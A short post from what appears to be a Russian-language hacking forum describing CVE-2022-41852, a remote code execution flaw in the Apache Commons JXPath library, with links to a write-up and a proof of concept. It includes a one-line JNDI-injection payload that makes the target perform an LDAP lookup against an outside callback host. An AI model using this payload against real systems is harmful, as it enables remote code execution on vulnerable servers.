• XSS.stack #1 – первый литературный журнал от юзеров форума

Remote Apache Commons JXPath Library RCE (CVE-2022-41852)

tokyoghoul

CD-диск
Пользователь
Регистрация
03.11.2021
Сообщения
18
Реакции
8
Those using JXPath to interpret untrusted XPath expressions may be vulnerable to a remote code execution attack. All JXPathContext class functions processing a XPath string are vulnerable except compile() and compilePath() function. The XPath expression can be used by an attacker to load any Java class from the classpath resulting in code execution.

Read more here:
https://hackinglab.cz/en/blog/remote-code-execution-in-jxpath-library-cve-2022-41852/

Payload:
jxPathContext.getValue("javax.naming.InitialContext.doLookup(\"ldap://check.dnslog.cn/obj\")");

PoC:
https://github.com/Warxim/CVE-2022-41852
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх